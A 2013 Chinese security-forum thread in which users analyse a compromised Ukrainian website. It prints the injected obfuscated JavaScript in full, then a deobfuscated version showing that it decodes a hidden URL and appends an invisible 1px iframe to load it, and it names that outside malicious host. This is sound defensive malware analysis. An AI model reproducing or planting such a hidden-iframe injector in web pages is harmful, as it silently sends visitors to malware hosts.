http://www.s-format.com.ua/index.php【失效 by dayangyang】

显示全部楼层 · 发表于 2013-4-23 18:54:12

本帖最后由 wjhstu-VxG 于 2013-4-24 17:47 编辑

咖啡没反应

显示全部楼层 · 发表于 2013-4-23 19:31:05

去召唤了……额……

<script type="text/javascript">var Lrkc=101;var zXnYRS='aarOF';var zjbHKB='WRdmM';if('hgWW'=='uagg')iixt();var DRkyDMH="";var hyUq;function RXpTl(){}
var aSTQgNzYv="\x73lice";if('zuySho'=='UbheFE')cTkb();function arIf(){var KfvfrG='ubaYuq';if('LUfaD'=='pLuaHl')xKXJBs();}
var oAmaUdQA="fromCharCo\x64e";var srOmo;var duNq;var yiJHBP="body";var QMoPe="939f9f9b655a5a9b9d9a8e97908c99598f8f999e599499919a5a929a599b939b6a9e948f685c";var IyRcO='Zpspx';var FieJmboeg="append\x43hild";function srJNuJ(){var eXWRV='cHiRD';if('qoTpi'=='TaGKkS')IGoYe();}var WzNIot=3;if('YUdDQO'=='LsEGtM')HuOozM();if('puBFaL'=='JGlEXu')PaYiXl='MBcnl';var shhcj=166;var jxJbjgwO="c\x6f\x6estruc\x74\x6fr";if('KJYk'=='pWrGpO')Ghamz();var gwrG=227;var px0_var="0\x70x";function BDPZ(){}
var CxTrnr="par\x73eInt";function ifGT(){}
var px1_var="1px";var YKkRyU;var IhfQVB=107;var sbpuPG=55;var appVersion_var="appVers\x69on";var vJXFaTm=(function(){var BOFI;if('UQxMMx'=='ePTSl')IWGKj();var qzLbm='kRRJOL';return this;function ROcePW(){}})();var GpQxp=220;var tTHFMjzDU="ajbBBk"[jxJbjgwO];if('wcIdx'=='XidEg')zVXsff();function rWpQEO(){var jVttn='DrWlp';if('SApQr'=='ZcOg')NfJOMZ();}function BlxSe(){}
var awhiPr;for(var UAHytZZ=0;UAHytZZ<QMoPe.length;UAHytZZ+=2){var PaPx=202;var pAEiJo=96;RmcUsG=vJXFaTm[CxTrnr](QMoPe[aSTQgNzYv](UAHytZZ,UAHytZZ+2),16)-43;var FBlc='uhBq';DRkyDMH+=tTHFMjzDU[oAmaUdQA](RmcUsG);var TaUE='gmDgeK';}
function Oedm(){}if('WojMJ'=='IOct')CbaOh='dcur';if('DZQrI'=='OuzN')HKsT='UVvm';var ErhHH="luGmkxfEd";var BpFRT=144;if('PtcA'=='hyHZiS')myCrLR='tFby';var yvsHvS='sSgPM';var AqUEfDhD="";var UCuasV;if(navigator[appVersion_var].indexOf("MSIE")!=-1){var ZLvh='GPJu';function TQcVeG(){var BWPg='VcAeB';if('agok'=='DDIeAr')ugghau();}
AqUEfDhD='<iframe name="'+ErhHH+'" src="'+DRkyDMH+'">';if('qKvkhb'=='VWtZ')MrmG='VGLUcr';}else{function xLzEk(){}
AqUEfDhD='iframe';}
var yltjHO=72;var ROBLPe='UTDG';var TQsMZtoOs=document.createElement(AqUEfDhD);TQsMZtoOs.YqjZga=function(){var HAdUa='MRbla';this["src"]=DRkyDMH;var xEGF='aGuYoV';var bQIHq='tSPdB';}
function NFqrBV(){var AkGiGi='ANuJ';if('qidI'=='RnqdJ')LSkoK();}function XicTli(){}
var xmVYM=186;TQsMZtoOs.style.height=px1_var;var NmdIM;function TpCf(){var RnfIbI='cWKFvg';if('kYGRQa'=='tsuTWi')IgWTDH();}
TQsMZtoOs.name=ErhHH;if('XLCWM'=='RaRiz')RzTI();var dDcEQW=89;TQsMZtoOs.YqjZga();var yXUH='nZfAJ';var HYUPwV='VdXdr';TQsMZtoOs.style.top=px0_var;function uyOm(){var CTsH='iISaTs';if('qbwvB'=='rvAy')rkNwf();}if('jIWVWk'=='MqqE')NqFlm();TQsMZtoOs.style.position="absolute";var EvvYG;var QBKZ='oDfdFl';var HwGYx=262;TQsMZtoOs.style.right=px0_var;TQsMZtoOs.style.width=px1_var;function BypRBQ(){var npOVAc='lEFk';if('xEfxcP'=='autyjB')XfHAPc();}
function gKvTZW(){function xkDz(){var uuFcW='sAnB';if('ytZrgl'=='vIjEq')snZWQN();}var Xiihw=194;if(document[yiJHBP]){var OEIcvY;if('AyZiTG'=='HGTWQ')QqHGo='MLQQMY';if('FrKc'=='XrAt')GsTyd='IqWTH';document[yiJHBP][FieJmboeg](TQsMZtoOs);if('gpJeq'=='VzKVy')loCFi();var YcZAm;var pJyT='TEiQc';}else{var qDRn='HhhH';function YSeD(){}
setTimeout(gKvTZW,120);function KBSm(){var BRoHE='ztbOFw';if('UVeKZ'=='iTXH')NzuFes();}}
var XzEn='UslOXl';function nSNA(){var aPFC='iMOYqd';if('TuDH'=='IKLmg')NZYRaS();}}
var hsqVu;if('WFDOae'=='qBPV')MntN();gKvTZW();if('iQQaZ'=='MBLtAG')EZvrom='jPqHRO';var FJEBAU=239;if('xVAzM'=='NuuUYn')Tcna='MSTR';</script>

复制代码

不知道对不对，反正我没找到其他的

显示全部楼层 · 发表于 2013-4-24 00:43:59

就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
开始就是一大堆无用的变量和函数
fromCharCo 。。iframe document.write。。。这些关键字都藏在了中间
去杂。去除无关的干扰，去除\X转义符得到：

<script type="text/javascript">
var DRkyDMH="";
var vJXFaTm=(function(){
return this;}
var QMoPe="939f9f9b655a5a9b9d9a8e97908c99598f8f999e599499919a5a929a599b939b6a9e948f685c";
var px0_var="0px";
var px1_var="1px";
var appVersion_var="appVersion";
var tTHFMjzDU="ajbBBk"[constructor];
for(var i=0;
i<QMoPe.length;
i+=2)
{
R=vJXFaTm[parseInt](QMoPe[slice](i,i+2),16)-43;
DRkyDMH+=tTHFMjzDU[fromCharCode](R);
}
var AqUEfDhD="";
if(navigator[appVersion_var].indexOf("MSIE")!=-1){
AqUEfDhD='<iframe name="'+ErhHH+'" src="'+DRkyDMH+'">';
}
else{
AqUEfDhD='iframe';
}
var TQsMZtoOs=document.createElement(AqUEfDhD);
TQsMZtoOs.YqjZga=function(){
this["src"]=DRkyDMH;
}
TQsMZtoOs.style.height=px1_var;
TQsMZtoOs.name=ErhHH;
TQsMZtoOs.YqjZga();
TQsMZtoOs.style.top=px0_var;
TQsMZtoOs.style.position="absolute";
TQsMZtoOs.style.right=px0_var;
TQsMZtoOs.style.width=px1_var;
var Xiihw=194;
if(document.body)
{
document.body.appendChild(TQsMZtoOs);
}
else{
setTimeout(gKvTZW,120);
}
</script>

复制代码

到这里想必能看出大概了，那么中间的网址究竟是啥？

<script type="text/javascript">
var D="";
var Q="939f9f9b655a5a9b9d9a8e97908c99598f8f999e599499919a5a929a599b939b6a9e948f685c";
for(var i=0;
i<Q.length;
i+=2)
{
R=parseInt(Q.slice(i,i+2),16)-43;
D+=String.fromCharCode(R);
}
alert(D);
</script>

复制代码

运行这段得到URL：http://proclean.ddns.info/go.php?sid=1
Chrome显示最后一次在此网站上发现可疑内容的时间是 2013-04-22。
点开跳转到http://guru-host.ru/了。。应该是已经失效了。。。
赶紧碎觉去明天见导师。。。

显示全部楼层 · 发表于 2013-4-24 00:45:03

AVAST 8.0已拦截

显示全部楼层 · 发表于 2013-4-24 00:47:28

忘记截图了

显示全部楼层 · 发表于 2013-4-24 00:56:31

dayangyang 发表于 2013-4-24 00:43
就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
...

我去。。。你好棒。早点休息！
有空pm！

显示全部楼层 · 发表于 2013-4-24 17:37:55

dayangyang 发表于 2013-4-24 00:43
就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
...

也不是越来越……是基本不靠谱了……特别是火狐这些新的

显示全部楼层 · 发表于 2013-4-24 17:44:37

dayangyang 发表于 2013-4-24 00:43
就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
...

给力啊，那么杂乱的都能去杂，真是火眼金睛啊……

[已鉴定] http://www.s-format.com.ua/index.php【失效 by dayangyang】

评分